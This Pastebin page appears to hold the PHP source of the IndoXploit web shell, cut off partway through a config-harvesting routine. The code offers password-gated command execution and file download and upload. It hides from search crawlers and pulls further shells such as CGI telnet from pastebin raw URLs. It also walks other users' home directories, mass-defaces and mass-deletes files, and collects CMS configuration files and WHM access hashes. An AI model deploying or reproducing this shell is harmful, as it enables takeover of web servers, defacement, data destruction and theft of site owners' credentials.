daily pastebin goal
30%
SHARE
TWEET

Untitled

a guest May 23rd, 2018 306 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. session_start();
  2. @error_reporting(0);
  3. @set_time_limit(0);
  4.  
  5. if(version_compare(PHP_VERSION, '5.3.0', '<')) {
  6.     @set_magic_quotes_runtime(0);
  7. }
  8.  
  9. @clearstatcache();
  10. @ini_set('error_log',NULL);
  11. @ini_set('log_errors',0);
  12. @ini_set('max_execution_time',0);
  13. @ini_set('output_buffering',0);
  14. @ini_set('display_errors', 0);
  15.  
  16. $password = "7b4939a8af28c814f0c757bb10f40d3d"; # md5: indoxploit
  17.  
  18. $SERVERIP  = (!$_SERVER['SERVER_ADDR']) ? gethostbyname($_SERVER['HTTP_HOST']) : $_SERVER['SERVER_ADDR'];
  19. $FILEPATH  = str_replace($_SERVER['DOCUMENT_ROOT'], "", path());
  20.  
  21. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  22.     $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot", "curl");
  23.     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  24.         header('HTTP/1.0 404 Not Found');
  25.         exit;
  26.     }
  27. }
  28.  
  29. function login_shell() {
  30. ?>
  31. <!DOCTYPE HTML>
  32. <html>
  33. <head>
  34. <title>IndoXploit</title>
  35. <style type="text/css">
  36. html {
  37.     margin: 20px auto;
  38.     background: #000000;
  39.     color: green;
  40.     text-align: center;
  41. }
  42. header {
  43.     color: green;
  44.     margin: 10px auto;
  45. }
  46. input[type=password] {
  47.     width: 250px;
  48.     height: 25px;
  49.     color: red;
  50.     background: transparent;
  51.     border: 1px dotted green;
  52.     margin-left: 20px;
  53.     text-align: center;
  54. }
  55. </style>
  56. </head>
  57. <center>
  58. <header>
  59.     <pre>
  60.  ___________________________
  61. < root@indoxploit:~# w00t??? >
  62.  ---------------------------
  63.    \         ,        ,
  64.     \       /(        )`
  65.      \      \ \___   / |
  66.             /- _  `-/  '
  67.            (/\/ \ \   /\
  68.            / /   | `    \
  69.            O O   ) /    |
  70.            `-^--'`<     '
  71.           (_.)  _  )   /
  72.            `.___/`    /
  73.              `-----' /
  74. <----.     __ / __   \
  75. <----|====O)))==) \) /====>
  76. <----'    `--' `.__,' \
  77.              |        |
  78.               \       /
  79.         ______( (_  / \______
  80.       ,'  ,-----'   |        \
  81.       `--{__________)        \/
  82.     </pre>
  83. </header>
  84. <form method="post">
  85. <input type="password" name="password">
  86. </form>
  87. <?php
  88. exit;
  89. }
  90.  
  91. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  92.     if(empty($password) || (isset($_POST['password']) && (md5($_POST['password']) == $password)))
  93.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  94.     else
  95.         login_shell();
  96.  
  97. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  98.     @ob_clean();
  99.     $file = $_GET['file'];
  100.     header('Content-Description: File Transfer');
  101.     header('Content-Type: application/octet-stream');
  102.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
  103.     header('Expires: 0');
  104.     header('Cache-Control: must-revalidate');
  105.     header('Pragma: public');
  106.     header('Content-Length: ' . filesize($file));
  107.     readfile($file);
  108.     exit;
  109. }
  110.  
  111. if(get_magic_quotes_gpc()) {
  112.     function idx_ss($array) {
  113.         return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  114.     }
  115.     $_POST = idx_ss($_POST);
  116. }
  117. ?>
  118. <!DOCTYPE HTML>
  119. <html>
  120. <!--
  121. ###############################################################################
  122. // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.
  123. // Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.
  124. // Tapi Selebihnya, itu hasil kreasi IndoXploit sendiri.
  125. // Tanpa kalian kita tidak akan BESAR seperti sekarang.
  126. // Greetz: All Member IndoXploit. & All My Friends.
  127. ###############################################################################
  128. // Special Thanks: Depok Cyber Security | Sanjungan Jiwa | 0x1999
  129. ###############################################################################
  130. -->
  131. <head>
  132. <title>IndoXploit</title>
  133. <meta name='author' content='IndoXploit'>
  134. <meta charset="UTF-8">
  135. <style type='text/css'>
  136. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  137. html {
  138.     background: #000000;
  139.     color: #ffffff;
  140.     font-size: 14px;
  141.     width: 100%;
  142. }
  143.  
  144. li {
  145.     display: inline;
  146.     margin: 5px;
  147.     padding: 5px;
  148. }
  149.  
  150. a {
  151.     color: #ffffff;
  152.     text-decoration: none;
  153. }
  154.  
  155. a:hover {
  156.     color: gold;
  157.     text-decoration: underline;
  158. }
  159.  
  160. b {
  161.     color: gold;
  162. }
  163.  
  164. pre {
  165.     font-size: 13px;
  166. }
  167.  
  168. table, th, td {
  169.     border-collapse:collapse;
  170.     background: transparent;
  171.     font-family: 'Ubuntu';
  172.     font-size: 13px;
  173. }
  174.  
  175. .table_home, .th_home, .td_home {
  176.     border: 1px solid #ffffff;
  177. }
  178.  
  179. .th_home {
  180.     color: lime;
  181. }
  182.  
  183. .td_home, .td_home > a {
  184.     color: #ffffff;
  185. }
  186.  
  187. .td_home > a:hover {
  188.     color: gold;
  189. }
  190.  
  191. th {
  192.     padding: 10px;
  193. }
  194.  
  195. tr:hover {
  196.     background: #006400;
  197.     color: #ffffff;
  198. }
  199.  
  200. input[type=text], input[type=password], .input {
  201.     background: transparent;
  202.     color: #ffffff;
  203.     border: 1px solid #ffffff;
  204.     padding: 3px;
  205.     font-family: 'Ubuntu';
  206.     font-size: 13px;
  207. }
  208.  
  209. input[type=submit] {
  210.     padding: 2px;}
  211.  
  212. input[type=submit]:hover {
  213.     cursor: pointer;
  214. }
  215.  
  216. input:focus, textarea:focus {
  217.   outline: 0;
  218.   border-color: #ffffff;
  219. }
  220.  
  221. textarea {
  222.     border: 1px solid #ffffff;
  223.     width: 100%;
  224.     height: 400px;
  225.     padding-left: 5px;
  226.     margin: 10px auto;
  227.     resize: none;
  228.     background: transparent;
  229.     color: #ffffff;
  230.     font-family: 'Ubuntu';
  231.     font-size: 13px;
  232. }
  233. iframe {
  234.     width: 100%;
  235.     min-height: 500px;
  236. }
  237. </style>
  238. </head>
  239. <body>
  240. <?php
  241. function path() {
  242.     if(isset($_GET['dir'])) {
  243.         $dir = str_replace("\\", "/", $_GET['dir']);
  244.         @chdir($dir);
  245.     } else {
  246.         $dir = str_replace("\\", "/", getcwd());
  247.     }
  248.     return $dir;
  249. }
  250.  
  251. function color($bold = 1, $colorid = null, $string = null) {
  252.         $color = array(
  253.             "</font>",              # 0 off
  254.             "<font color='red'>",   # 1 red
  255.             "<font color='lime'>",  # 2 lime
  256.             "<font color='white'>", # 3 white
  257.             "<font color='gold'>",  # 4 gold
  258.         );
  259.  
  260.     return ($string !== null) ? $color[$colorid].$string.$color[0]: $color[$colorid];
  261. }
  262.  
  263. function OS() {
  264.     return (substr(strtoupper(PHP_OS), 0, 3) === "WIN") ? "Windows" : "Linux";
  265. }
  266.  
  267. function exe($cmd) {
  268.     if(function_exists('system')) {        
  269.         @ob_start();       
  270.         @system($cmd);     
  271.         $buff = @ob_get_contents();        
  272.         @ob_end_clean();       
  273.         return $buff;  
  274.     } elseif(function_exists('exec')) {        
  275.         @exec($cmd,$results);      
  276.         $buff = "";        
  277.         foreach($results as $result) {         
  278.             $buff .= $result;      
  279.         } return $buff;    
  280.     } elseif(function_exists('passthru')) {        
  281.         @ob_start();       
  282.         @passthru($cmd);       
  283.         $buff = @ob_get_contents();        
  284.         @ob_end_clean();       
  285.         return $buff;  
  286.     } elseif(function_exists('shell_exec')) {      
  287.         $buff = @shell_exec($cmd);     
  288.         return $buff;  
  289.     }
  290. }
  291.  
  292. function save($filename, $mode, $file) {
  293.     $handle = fopen($filename, $mode);
  294.     fwrite($handle, $file);
  295.     fclose($handle);
  296.     return;
  297. }
  298.  
  299. function getfile($name) {
  300.     if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't spawn $name."));
  301.     if($name === "adminer") $get = array("https://www.adminer.org/static/download/4.3.1/adminer-4.3.1.php", "adminer.php");
  302.     elseif($name === "webconsole") $get = array("https://pastebin.com/raw/2i96fDCN", "webconsole.php");
  303.     elseif($name === "cgitelnet1") $get = array("https://pastebin.com/raw/Lj46KxFT", "idx_cgi/cgitelnet1.idx");
  304.     elseif($name === "cgitelnet2") $get = array("https://pastebin.com/raw/aKL2QWfS", "idx_cgi/cgitelnet2.idx");
  305.     elseif($name === "LRE") $get = array("https://pastebin.com/raw/PVPfA21i", "makman.php");
  306.  
  307.     $fp = fopen($get[1], "w");
  308.     $ch = curl_init();
  309.           curl_setopt($ch, CURLOPT_URL, $get[0]);
  310.           curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  311.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  312.           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  313.           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
  314.           curl_setopt($ch, CURLOPT_FILE, $fp);
  315.     return curl_exec($ch);
  316.           curl_close($ch);
  317.     fclose($fp);
  318.     ob_flush();
  319.     flush();
  320. }
  321.  
  322. function usergroup() {
  323.     if(!function_exists('posix_getegid')) {
  324.         $user['name']   = @get_current_user();
  325.         $user['uid']    = @getmyuid();
  326.         $user['gid']    = @getmygid();
  327.         $user['group']  = "?";
  328.     } else {
  329.         $user['uid']    = @posix_getpwuid(posix_geteuid());
  330.         $user['gid']    = @posix_getgrgid(posix_getegid());
  331.         $user['name']   = $user['uid']['name'];
  332.         $user['uid']    = $user['uid']['uid'];
  333.         $user['group']  = $user['gid']['name'];
  334.         $user['gid']    = $user['gid']['gid'];
  335.     }
  336.     return (object) $user;
  337. }
  338.  
  339. function getuser() {
  340.     $fopen = fopen("/etc/passwd", "r") or die(color(1, 1, "Can't read /etc/passwd"));
  341.     while($read = fgets($fopen)) {
  342.         preg_match_all('/(.*?):x:/', $read, $getuser);
  343.         $user[] = $getuser[1][0];
  344.     }
  345.     return $user;
  346. }
  347.  
  348. function getdomainname() {
  349.     $fopen = fopen("/etc/named.conf", "r");
  350.     while($read = fgets($fopen)) {
  351.         preg_match_all("#/var/named/(.*?).db#", $read, $getdomain);
  352.         $domain[] = $getdomain[1][0];
  353.     }
  354.     return $domain;
  355. }
  356.  
  357. function hddsize($size) {
  358.     if($size >= 1073741824)
  359.         return sprintf('%1.2f',$size / 1073741824 ).' GB';
  360.     elseif($size >= 1048576)
  361.         return sprintf('%1.2f',$size / 1048576 ) .' MB';
  362.     elseif($size >= 1024)
  363.         return sprintf('%1.2f',$size / 1024 ) .' KB';
  364.     else
  365.         return $size .' B';
  366. }
  367.  
  368. function hdd() {
  369.     $hdd['size'] = hddsize(disk_total_space("/"));
  370.     $hdd['free'] = hddsize(disk_free_space("/"));
  371.     $hdd['used'] = $hdd['size'] - $hdd['free'];
  372.     return (object) $hdd;
  373. }
  374.  
  375. function writeable($path, $perms) {
  376.     return (!is_writable($path)) ? color(1, 1, $perms) : color(1, 2, $perms);
  377. }
  378.  
  379. function perms($path) {
  380.     $perms = fileperms($path);
  381.     if (($perms & 0xC000) == 0xC000) {
  382.         // Socket
  383.         $info = 's';
  384.     }
  385.     elseif (($perms & 0xA000) == 0xA000) {
  386.         // Symbolic Link
  387.         $info = 'l';
  388.     }
  389.     elseif (($perms & 0x8000) == 0x8000) {
  390.         // Regular
  391.         $info = '-';
  392.     }
  393.     elseif (($perms & 0x6000) == 0x6000) {
  394.         // Block special
  395.         $info = 'b';
  396.     }
  397.     elseif (($perms & 0x4000) == 0x4000) {
  398.         // Directory
  399.         $info = 'd';
  400.     }
  401.     elseif (($perms & 0x2000) == 0x2000) {
  402.         // Character special
  403.         $info = 'c';
  404.     }
  405.     elseif (($perms & 0x1000) == 0x1000) {
  406.         // FIFO pipe
  407.         $info = 'p';
  408.     }
  409.     else {
  410.         // Unknown
  411.         $info = 'u';
  412.     }
  413.         // Owner
  414.     $info .= (($perms & 0x0100) ? 'r' : '-');
  415.     $info .= (($perms & 0x0080) ? 'w' : '-');
  416.     $info .= (($perms & 0x0040) ?
  417.     (($perms & 0x0800) ? 's' : 'x' ) :
  418.     (($perms & 0x0800) ? 'S' : '-'));
  419.     // Group
  420.     $info .= (($perms & 0x0020) ? 'r' : '-');
  421.     $info .= (($perms & 0x0010) ? 'w' : '-');
  422.     $info .= (($perms & 0x0008) ?
  423.     (($perms & 0x0400) ? 's' : 'x' ) :
  424.     (($perms & 0x0400) ? 'S' : '-'));
  425.     // World
  426.     $info .= (($perms & 0x0004) ? 'r' : '-');
  427.     $info .= (($perms & 0x0002) ? 'w' : '-');
  428.     $info .= (($perms & 0x0001) ?
  429.     (($perms & 0x0200) ? 't' : 'x' ) :
  430.     (($perms & 0x0200) ? 'T' : '-'));
  431.  
  432.     return $info;
  433. }
  434.  
  435. function lib_installed() {
  436.     $lib[] = "MySQL: ".(function_exists('mysql_connect') ? color(1, 2, "ON") : color(1, 1, "OFF"));
  437.     $lib[] = "cURL: ".(function_exists('curl_version') ? color(1, 2, "ON") : color(1, 1, "OFF"));
  438.     $lib[] = "WGET: ".(exe('wget --help') ? color(1, 2, "ON") : color(1, 1, "OFF"));
  439.     $lib[] = "Perl: ".(exe('perl --help') ? color(1, 2, "ON") : color(1, 1, "OFF"));
  440.     $lib[] = "Python: ".(exe('python --help') ? color(1, 2, "ON") : color(1, 1, "OFF"));
  441.     return implode(" | ", $lib);
  442. }
  443.  
  444. function pwd() {
  445.     $dir = explode("/", path());
  446.     foreach($dir as $key => $index) {
  447.         print "<a href='?dir=";
  448.         for($i = 0; $i <= $key; $i++) {
  449.             print $dir[$i];
  450.             if($i != $key) {
  451.             print "/";
  452.             }
  453.         }
  454.         print "'>$index</a>/";
  455.     }
  456.     print "<br>";
  457.     print (OS() === "Windows") ? windisk() : "";
  458. }
  459.  
  460. function windisk() {
  461.     $letters = "";
  462.     $v = explode("\\", path());
  463.     $v = $v[0];
  464.      foreach(range("A", "Z") as $letter) {
  465.         $bool = $isdiskette = in_array($letter, array("A"));
  466.         if(!$bool) $bool = is_dir("$letter:\\");
  467.         if($bool) {
  468.             $letters .= "[ <a href='?dir=$letter:\\'".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">";
  469.             if($letter.":" != $v) {
  470.                 $letters .= $letter;
  471.             }
  472.             else {
  473.                 $letters .= color(1, 2, $letter);
  474.             }
  475.             $letters .= "</a> ]";
  476.         }
  477.     }
  478.     if(!empty($letters)) {
  479.         print "Detected Drives $letters<br>";
  480.     }
  481.     if(count($quicklaunch) > 0) {
  482.         foreach($quicklaunch as $item) {
  483.             $v = realpath(path(). "..");
  484.             if(empty($v)) {
  485.                 $a = explode(DIRECTORY_SEPARATOR,path());
  486.                 unset($a[count($a)-2]);
  487.                 $v = join(DIRECTORY_SEPARATOR, $a);
  488.             }
  489.             print "<a href='".$item[1]."'>".$item[0]."</a>";
  490.         }
  491.     }
  492. }
  493.  
  494. function serverinfo() {
  495.     $disable_functions = @ini_get('disable_functions');
  496.     $disable_functions = (!empty($disable_functions)) ? color(1, 1, $disable_functions) : color(1, 2, "NONE");
  497.  
  498.     $output[] = "SERVER IP ".color(1, 2, $GLOBALS['SERVERIP'])." / YOUR IP ".color(1, 2, $_SERVER['REMOTE_ADDR']);
  499.     $output[] = "WEB SERVER  : ".color(1, 2, $_SERVER['SERVER_SOFTWARE']);
  500.     $output[] = "SYSTEM      : ".color(1, 2, php_uname());
  501.     $output[] = "USER / GROUP: ".color(1, 2, usergroup()->name)."(".color(1, 2 , usergroup()->uid).") / ".color(1, 2 , usergroup()->group)."(".color(1, 2 , usergroup()->gid).")";
  502.     $output[] = "HDD         : ".color(1, 2, hdd()->used)." / ".color(1, 2 , hdd()->size)." (Free: ".color(1, 2 , hdd()->free).")";
  503.     $output[] = "PHP VERSION : ".color(1, 2, @phpversion());
  504.     $output[] = "SAFE MODE   : ".(@ini_get(strtoupper("safe_mode")) === "ON" ? color(1, 2, "ON") : color(1, 2, "OFF"));
  505.     $output[] = "DISABLE FUNC: $disable_functions";
  506.     $output[] = lib_installed();
  507.     $output[] = "Current Dir (".writeable(path(), perms(path())).") ";
  508.  
  509.     print "<pre>";
  510.     print implode("<br>", $output);
  511.     pwd();
  512.     print "</pre>";
  513.  
  514. }
  515.  
  516. function curl($url, $post = false, $data = null) {
  517.     $ch = curl_init($url);
  518.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  519.           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  520.           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  521.           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
  522.           curl_setopt($ch, CURLOPT_TIMEOUT, 10);
  523.           curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
  524.     if($post) {
  525.           curl_setopt($ch, CURLOPT_POST, true);
  526.           curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
  527.     }
  528.     return curl_exec($ch);
  529.           curl_close($ch);
  530. }
  531.  
  532. function reverse() {
  533.     $response = curl("http://domains.yougetsignal.com/domains.php", TRUE, "remoteAddress=".$GLOBALS['SERVERIP']."&ket=");
  534.     $response = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $response)))))))))))));
  535.     $explode  = explode(",,", $response);
  536.     unset($explode[0]);
  537.  
  538.     foreach($explode as $domain) {
  539.         $domain = "http://$domain";
  540.         $domain = str_replace(",", "", $domain);
  541.         $url[]  = $domain;
  542.         ob_flush();
  543.         flush();
  544.     }
  545.  
  546.     return $url;
  547. }
  548.  
  549. function getValue($param, $kata1, $kata2){
  550.     if(strpos($param, $kata1) === FALSE) return FALSE;
  551.     if(strpos($param, $kata2) === FALSE) return FALSE;
  552.     $start  = strpos($param, $kata1) + strlen($kata1);
  553.     $end    = strpos($param, $kata2, $start);
  554.     $return = substr($param, $start, $end - $start);
  555.     return $return;
  556. }
  557.  
  558. function massdeface($dir, $file, $filename, $type = null) {
  559.     $scandir = scandir($dir);
  560.     foreach($scandir as $dir_) {
  561.         $path     = "$dir/$dir_";
  562.         $location = "$path/$filename";
  563.         if($dir_ === "." || $dir_ === "..") {
  564.             file_put_contents($location, $file);
  565.         }
  566.         else {
  567.             if(is_dir($path) AND is_writable($path)) {
  568.                 print "[".color(1, 2, "DONE")."] ".color(1, 4, $location)."<br>";
  569.                 file_put_contents($location, $file);
  570.                 if($type === "-alldir") {
  571.                     massdeface($path, $file, $filename, "-alldir");
  572.                 }
  573.             }
  574.         }
  575.     }
  576. }
  577.  
  578. function massdelete($dir, $filename) {
  579.     $scandir = scandir($dir);
  580.     foreach($scandir as $dir_) {
  581.         $path     = "$dir/$dir_";
  582.         $location = "$path/$filename";
  583.         if($dir_ === '.') {
  584.             if(file_exists("$dir/$filename")) {
  585.                 unlink("$dir/$filename");
  586.             }
  587.         }
  588.         elseif($dir_ === '..') {
  589.             if(file_exists(dirname($dir)."/$filename")) {
  590.                 unlink(dirname($dir)."/$filename");
  591.             }
  592.         }
  593.         else {
  594.             if(is_dir($path) AND is_writable($path)) {
  595.                 if(file_exists($location)) {
  596.                     print "[".color(1, 2, "DELETED")."] ".color(1, 4, $location)."<br>";
  597.                     unlink($location);
  598.                     massdelete($path, $filename);
  599.                 }
  600.             }
  601.         }
  602.     }
  603. }
  604.  
  605. function tools($toolsname, $args = null) {
  606.     if($toolsname === "cmd") {
  607.         print "<form method='post' action='?do=cmd&dir=".path()."' style='margin-top: 15px;'>
  608.               ".usergroup()->name."@".$GLOBALS['SERVERIP'].": ~ $
  609.               <input style='border: none; border-bottom: 1px solid #ffffff;' type='text' name='cmd' required>
  610.               <input style='border: none; border-bottom: 1px solid #ffffff;' class='input' type='submit' value='>>'>
  611.               </form>";
  612.     }
  613.     elseif($toolsname === "readfile") {
  614.         if(empty($args)) die(color(1, 1, $msg));
  615.         if(!is_file($args)) die(color(1, 1, "File '$args' is not exists."));
  616.  
  617.         print "<pre>";
  618.         print htmlspecialchars(file_get_contents($args));
  619.         print "</pre>";
  620.     }
  621.     elseif($toolsname === "spawn") {
  622.         if($args === "adminer") {
  623.             if(file_exists("adminer.php")) {
  624.                 print "Login Adminer: <a href='".$GLOBALS['FILEPATH']."/adminer.php' target='_blank'>http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/adminer.php</a>";
  625.             }
  626.             else {
  627.                 if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'Adminer'."));
  628.                 if(getfile("adminer")) {
  629.                     print "Login Adminer: <a href='".$GLOBALS['FILEPATH']."/adminer.php' target='_blank'>http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/adminer.php</a>";
  630.                 }
  631.                 else {
  632.                     print color(1, 1, "Error while downloading file Adminer.");
  633.                     @unlink("adminer.php");
  634.                 }
  635.             }
  636.         }
  637.         elseif($args === "webconsole") {
  638.             if(file_exists("webconsole.php")) {
  639.                 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/webconsole.php' frameborder='0' scrolling='yes'></iframe>";
  640.             }
  641.             else {
  642.                 if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'WebConsole'."));
  643.                 if(getfile("webconsole")) {
  644.                     print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/webconsole.php' frameborder='0' scrolling='yes'></iframe>";
  645.                 }
  646.                 else {
  647.                     print color(1, 1, "Error while downloading file WebConsole.");
  648.                     @unlink("webconsole.php");
  649.                 }
  650.             }
  651.         }
  652.         elseif($args === "cgitelnet1") {
  653.             if(file_exists("idx_cgi/cgitelnet1.idx")) {
  654.                 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_cgi/cgitelnet1.idx' frameborder='0' scrolling='yes'></iframe>";
  655.             }
  656.             elseif(file_exists('cgitelnet1.idx')) {
  657.                 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/cgitelnet1.idx' frameborder='0' scrolling='yes'></iframe>";
  658.             }
  659.             else {
  660.                 if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_cgi'."));
  661.                 if(!is_dir(path()."/idx_cgi/")) {
  662.                     @mkdir('idx_cgi', 0755);
  663.                     save("idx_cgi/.htaccess", "w", "AddHandler cgi-script .idx");
  664.                 }
  665.                 if(getfile("cgitelnet1")) {
  666.                     chmod('idx_cgi/cgitelnet1.idx', 0755);
  667.                     print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_cgi/cgitelnet1.idx' frameborder='0' scrolling='yes'></iframe>";
  668.                 }
  669.                 else {
  670.                     print color(1, 1, "Error while downloading file CGI Telnet.");
  671.                     @rmdir(path()."/idx_cgi/");
  672.                     if(!@rmdir(path()."/idx_cgi/") AND OS() === "Linux") @exe("rm -rf ".path()."/idx_cgi/");
  673.                     if(!@rmdir(path()."/idx_cgi/") AND OS() === "Windows") @exe("rmdir /s /q ".path()."/idx_cgi/");
  674.                 }
  675.             }
  676.    
  677.         }
  678.         elseif($args === "cgitelnet2") {
  679.             if(file_exists("idx_cgi/cgitelnet2.idx")) {
  680.                 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_cgi/cgitelnet2.idx' frameborder='0' scrolling='yes'></iframe>";
  681.             }
  682.             elseif(file_exists('cgitelnet2.idx')) {
  683.                 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/cgitelnet2.idx' frameborder='0' scrolling='no'></iframe>";
  684.             }
  685.             else {
  686.                 if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_cgi'."));
  687.                 if(!is_dir(path()."/idx_cgi/")) {
  688.                     @mkdir('idx_cgi', 0755);
  689.                     save("idx_cgi/.htaccess", "w", "AddHandler cgi-script .idx");
  690.                 }
  691.                 if(getfile("cgitelnet2")) {
  692.                     chmod('idx_cgi/cgitelnet2.idx', 0755);
  693.                     print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_cgi/cgitelnet2.idx' frameborder='0' scrolling='yes'></iframe>";
  694.                 }
  695.                 else {
  696.                     print color(1, 1, "Error while downloading file CGI Telnet.");
  697.                     @rmdir(path()."/idx_cgi/");
  698.                     if(!@rmdir(path()."/idx_cgi/") AND OS() === "Linux") @exe("rm -rf ".path()."/idx_cgi/");
  699.                     if(!@rmdir(path()."/idx_cgi/") AND OS() === "Windows") @exe("rmdir /s /q ".path()."/idx_cgi/");
  700.                 }
  701.             }
  702.    
  703.         }
  704.         elseif($args === "phpinfo") {
  705.             if(file_exists('phpinfo.php') AND preg_match("/phpinfo()/", file_get_contents('phpinfo.php'))) {
  706.                 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/phpinfo.php' frameborder='0' scrolling='yes'></iframe>";
  707.             }
  708.             else {
  709.                 if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'phpinfo'."));
  710.                 save("phpinfo.php", "w", "<?php print '<html><style>html,body {background: #000000;}</style><div style=\'background: #000000; color: #cccccc;\'>'; phpinfo(); print '</div></html>'; ?>");
  711.                 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/phpinfo.php' frameborder='0' scrolling='yes'></iframe>";
  712.             }
  713.         }
  714.     }
  715.     elseif($toolsname === "upload") {
  716.         if($_POST['upload']) {
  717.             if($_POST['uploadtype'] === '1') {
  718.                 if(@copy($_FILES['file']['tmp_name'], path().DIRECTORY_SEPARATOR.$_FILES['file']['name']."")) {
  719.                     $act = color(1, 2, "Uploaded!")." at <i><b>".path().DIRECTORY_SEPARATOR.$_FILES['file']['name']."</b></i>";
  720.                 }
  721.                 else {
  722.                     $act = color(1, 1, "Failed to upload file!");
  723.                 }
  724.             }
  725.             elseif($_POST['uploadtype'] === '2') {
  726.                 $root = $_SERVER['DOCUMENT_ROOT'].DIRECTORY_SEPARATOR.$_FILES['file']['name'];
  727.                 $web = $_SERVER['HTTP_HOST'].DIRECTORY_SEPARATOR.$_FILES['file']['name'];
  728.                 if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  729.                     if(@copy($_FILES['file']['tmp_name'], $root)) {
  730.                         $act = color(1, 2, "Uploaded!")." at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  731.                     }
  732.                     else {
  733.                         $act = color(1, 1, "Failed to upload file!");
  734.                     }
  735.                 }
  736.                 else {
  737.                     $act = color(1, 1, "Failed to upload file!");
  738.                 }
  739.             }
  740.         }
  741.         print "Upload File: $act
  742.               <form method='post' enctype='multipart/form-data'>
  743.               <input type='radio' name='uploadtype' value='1' checked>current_dir [ ".writeable(path(), "Writeable")." ]
  744.               <input type='radio' name='uploadtype' value='2'>document_root [ ".writeable($_SERVER['DOCUMENT_ROOT'], "Writeable")." ]<br>
  745.               <input type='file' name='file'>
  746.               <input type='submit' value='upload' name='upload'>
  747.               </form>";
  748.     }
  749.     elseif($toolsname === "jumping") {
  750.         $i = 0;
  751.         foreach(getuser() as $user) {
  752.             $path = "/home/$user/public_html";
  753.             if(is_readable($path)) {
  754.                 $status = color(1, 2, "[R]");
  755.                 if(is_writable($path)) {
  756.                     $status = color(1, 2, "[RW]");
  757.                 }
  758.                 $i++;
  759.                 print "$status <a href='?dir=$path'>".color(1, 4, $path)."</a>";
  760.                 if(!function_exists('posix_getpwuid')) print "<br>";
  761.                 if(!getdomainname()) print " => ".color(1, 1, "Can't get domain name")."<br>";
  762.                 foreach(getdomainname() as $domain) {
  763.                     $userdomain = (object) @posix_getpwuid(@fileowner("/etc/valiases/$domain"));
  764.                     $userdomain = $userdomain->name;
  765.                     if($userdomain === $user) {
  766.                         print " => <a href='http://$domain/' target='_blank'>".color(1, 2, $domain)."</a><br>";
  767.                         break;
  768.                     }
  769.                 }
  770.             }
  771.         }
  772.         print ($i === 0) ? "" : "<p>".color(1, 3, "Total ada $i kamar di ".$GLOBALS['SERVERIP'])."</p>";
  773.     }
  774.     elseif($toolsname === "idxconfig") {
  775.         if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_config'."));
  776.         if(!is_dir(path()."/idx_config/")) {
  777.             @mkdir('idx_config', 0755);
  778.             $htaccess = "Options all\nDirectoryIndex indoxploit.htm\nSatisfy Any";
  779.             save("idx_config/.htaccess","w", $htaccess);
  780.  
  781.             foreach(getuser() as $user) {
  782.                 $user_docroot = "/home/$user/public_html/";
  783.                 if(is_readable($user_docroot)) {
  784.                     $getconfig = array(
  785.                         "/home/$user/.accesshash" => "WHM-accesshash",
  786.                         "$user_docroot/config/koneksi.php" => "Lokomedia",
  787.                         "$user_docroot/forum/config.php" => "phpBB",
  788.                         "$user_docroot/sites/default/settings.php" => "Drupal",
  789.                         "$user_docroot/config/settings.inc.php" => "PrestaShop",
  790.                         "$user_docroot/app/etc/local.xml" => "Magento",
  791.                         "$user_docroot/admin/config.php" => "OpenCart",
